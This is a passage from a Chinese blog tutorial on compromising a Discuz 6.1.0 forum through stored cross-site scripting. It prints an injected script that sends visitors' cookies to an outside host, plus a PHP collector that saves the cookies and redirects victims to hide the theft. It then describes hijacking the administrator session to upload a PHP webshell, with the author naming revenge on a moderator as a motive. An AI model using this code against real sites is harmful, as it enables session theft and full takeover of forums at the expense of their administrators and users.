利用XSS渗透DISCUZ 6.1.0实战


当前第2页 返回上一页

论坛——>入侵者布置的跨站攻击——>转移被入侵这视线(隐蔽)

论坛插入脚本:

var img = new Image();
img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);


但是我不一样,因为他需要诱导人去点击他的链接,但是现在人不是傻子,不会轻易点你的链接。而我是要把脚步插入论坛页面中,这样既隐蔽又省去了诱导的力气
我插入的脚本如下:

**********************************************************************************************
<script language="JavaScript"> window.location.href="http://www.****.cn/upload_files/reg.php?var"+document.cookie; </script>
**********************************************************************************************


跨站攻击脚本:
reg.php

************************************************************************************
<?php
if (isset($_GET['var'])) {
     file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var']));
}
?>

<script language="JavaScript"> window.location.href="http://www.ccXv.com"; </script> //转移页面隐蔽上面记录cookie的操作

************************************************************************************


剩下的步骤就是等着鱼自己上钩了

当管理员帐号点入论坛某个页面时,这个页面却被转到了某新闻网站,其实不知,他的cookie已经被记录

拿这个cookie登录论坛,(删东西不推荐哦~~),可以临时开启上传php文件,例如phpwebshell,然后再关闭,这样你就可以很轻松的操控整个论坛站点

为什么选择此论坛做入侵讲解,很简单,这个论坛具备了多个漏洞:
一、论坛有XSS漏洞,没有对输入输出做过滤
二、论坛采用cookie方式记录用户信息
三、对论坛上某个版主看不惯,有点权利乱封号,不过,毕竟论坛不是那个人的,还是对管理员手下留情吧(做人要厚道!)

更多关于Discuz论坛内容来自木庄网络博客


标签:Discuz论坛

返回前面的内容

相关阅读 >>

推荐一个比较不错简单的php运行平台软件phpnow 搭建 php 环境[安装图文教程]

完美转换mysql的字符集 解决查看utf8源文件中的乱码问题

discuz!5的php代码高亮显示插件(黑暗中的舞者更新)

php用户密码加密算法分析【discuz加密算法】

discuz!x3新功能屏蔽水帖介紹及使用(图文)

discuz!论坛详细安装方法以及调试过程(图文教程)

iis图片防盗链和下载的解决方案

discuz、ucenter登陆管理后台自动退出的解决方法

dedecms常用sql语句汇总

php模拟登陆的实现方法分析

更多相关阅读请进入《Discuz论坛》频道 >>



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...

    正在狠努力加载,请稍候...